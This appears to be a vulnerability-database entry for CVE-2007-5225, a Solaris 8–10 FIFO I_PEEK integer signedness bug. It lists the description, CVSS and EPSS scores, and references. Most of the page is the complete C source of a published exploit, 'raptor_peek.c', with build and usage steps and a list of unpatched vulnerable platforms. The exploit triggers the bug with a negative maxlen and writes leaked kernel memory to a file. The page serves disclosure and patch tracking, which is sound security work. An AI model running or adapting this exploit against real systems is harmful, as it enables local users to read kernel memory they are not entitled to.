CVE-2007-5225 : Detail


EPSS score (v3): 0.12%
Attack vector: Local
Published: 2007-10-04 22h00 +00:00
Last updated: 2018-10-15 18h57 +00:00

CVE Descriptions

Integer signedness error in FIFO filesystems (named pipes) on Sun Solaris 8 through 10 allows local users to read the contents of unspecified memory locations via a negative maximum length value to the I_PEEK ioctl.

CVE Information

Related Weaknesses

CWE-ID: CWE-189
Weakness name: Category: Numeric Errors
Description: Weaknesses in this category are related to improper calculation or conversion of numbers.

Metrics

CVSS V2 score: 4.9
CVSS V2 vector: AV:L/AC:L/Au:N/C:C/I:N/A:N
Source: [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVEs according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVEs. The percentile therefore lets the EPSS score of one CVE be compared with that of all other CVEs.

Exploit information

Exploit Database EDB-ID : 5227

Publication date : 2008-03-09 23h00 +00:00
Author : Marco Ivaldi
EDB Verified : Yes

```c
/*
 * $Id: raptor_peek.c,v 1.1 2007/10/18 08:09:02 raptor Exp $
 *
 * raptor_peek.c - Solaris fifofs I_PEEK kernel memory leak
 * Copyright (c) 2007 Marco Ivaldi <[email protected]>
 *
 * [Lame] integer signedness error in FIFO filesystems (named pipes) on Sun
 * Solaris 8 through 10 allows local users to read the contents of unspecified
 * memory locations via a negative value to the I_PEEK ioctl (CVE-2007-5225).
 *
 * Usage:
 * $ gcc raptor_peek.c -o raptor_peek -Wall
 * $ ./raptor_peek kerndump 666666
 * [...]
 * $ ls -l kerndump
 * -rwx------   1 raptor   staff     666666 Oct 17 19:33 kerndump
 *
 * Vulnerable platforms (SPARC):
 * Solaris 8 without patch 109454-06 [tested]
 * Solaris 9 without patch 117471-04 [tested]
 * Solaris 10 without patch 127737-01 [tested]
 *
 * Vulnerable platforms (x86):
 * Solaris 8 without patch 109455-06 [untested]
 * Solaris 9 without patch 117472-04 [untested]
 * Solaris 10 without patch 127738-01 [untested]
 */

#include <errno.h>     /* errno is declared here; do not redeclare it */
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>    /* memset() */
#include <stropts.h>   /* struct strpeek, I_PEEK (STREAMS ioctls) */
#include <unistd.h>
#include <sys/stat.h>

#define INFO1 "raptor_peek.c - Solaris fifofs I_PEEK kernel memory leak"
#define INFO2 "Copyright (c) 2007 Marco Ivaldi <[email protected]>"

#define BADFIFO "/tmp/fnord"
#define BUFSIZE 1000000

int main(int argc, char **argv)
{
	int fd, fifo;
	ssize_t out;
	size_t bufsize = BUFSIZE;
	char *buf;
	struct strpeek peek;

	/* print exploit information */
	fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);

	/* read command line */
	if (argc < 2) {
		fprintf(stderr, "usage: %s outfile [outsize]\n\n", argv[0]);
		exit(1);
	}
	if (argc > 2) {
		if ((bufsize = atoi(argv[2])) == 0) {
			fprintf(stderr, "Error (atoi): invalid outsize\n");
			exit(1);
		}
	}

	/* print some output */
	fprintf(stderr, "Using outfile\t: %s\n", argv[1]);
	fprintf(stderr, "Using outsize\t: %lu\n\n", (unsigned long)bufsize);

	/* prepare the output buffer */
	if ((buf = (char *)malloc(bufsize)) == NULL) {
		perror("Error (malloc)");
		fprintf(stderr, "Hint: Try again with a smaller output size\n");
		exit(1);
	}
	memset(buf, 0, bufsize);

	/* create the named pipe */
	unlink(BADFIFO);
	if (mknod(BADFIFO, S_IFIFO | S_IRWXU, 0) < 0) {
		perror("Error (mknod)");
		exit(1);
	}

	switch (fork()) {
	case -1: /* cannot fork */
		perror("Error (fork)");
		exit(1);
	case 0: /* the child writes */
		if ((fifo = open(BADFIFO, O_WRONLY, 0)) < 0) {
			perror("Error (open)");
			exit(1);
		}
		write(fifo, "FNORD", 5);
		exit(0);
	default: /* the parent reads */
		/* FALL THROUGH */
		;
	}

	/* perform the MAGICK */
	if ((fifo = open(BADFIFO, O_RDONLY, 0)) < 0) {
		perror("Error (open)");
		exit(1);
	}
	memset(&peek, 0, sizeof(peek));
	peek.databuf.buf = buf;
	peek.databuf.maxlen = -1; /* FNORD! negative maxlen triggers the signedness bug */
	if (ioctl(fifo, I_PEEK, &peek) < 0) {
		perror("Error (ioctl)");
		close(fifo);
		exit(1);
	}

	/* save output to outfile */
	if ((fd = open(argv[1], O_RDWR | O_CREAT | O_TRUNC, 0700)) < 0) {
		perror("Error (open)");
		close(fifo);
		exit(1);
	}
	out = write(fd, buf, bufsize);
	fprintf(stderr, "FNORD! %ld bytes written to %s\n", (long)out, argv[1]);
	fprintf(stderr, "Hint: Try also with a bigger output size\n");

	/* cleanup (who cares about free?;) */
	close(fd);
	close(fifo);
	exit(0);
}

// milw0rm.com [2008-03-10]
```

Products Mentioned

Configuration 0

Sun >> SunOS >> Version 5.8

Sun >> SunOS >> Version 5.9

Sun >> SunOS >> Version 5.10

References

http://secunia.com/advisories/27654
Tags : third-party-advisory, x_refsource_SECUNIA
https://www.exploit-db.com/exploits/5227
Tags : exploit, x_refsource_EXPLOIT-DB
http://secunia.com/advisories/27024
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.securityfocus.com/bid/25905
Tags : vdb-entry, x_refsource_BID
http://www.vupen.com/english/advisories/2007/3339
Tags : vdb-entry, x_refsource_VUPEN
https://www.exploit-db.com/exploits/4516
Tags : exploit, x_refsource_EXPLOIT-DB
http://sunsolve.sun.com/search/document.do?assetkey=1-26-103061-1
Tags : vendor-advisory, x_refsource_SUNALERT
http://www.securitytracker.com/id?1018766
Tags : vdb-entry, x_refsource_SECTRACK
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=603
Tags : third-party-advisory, x_refsource_IDEFENSE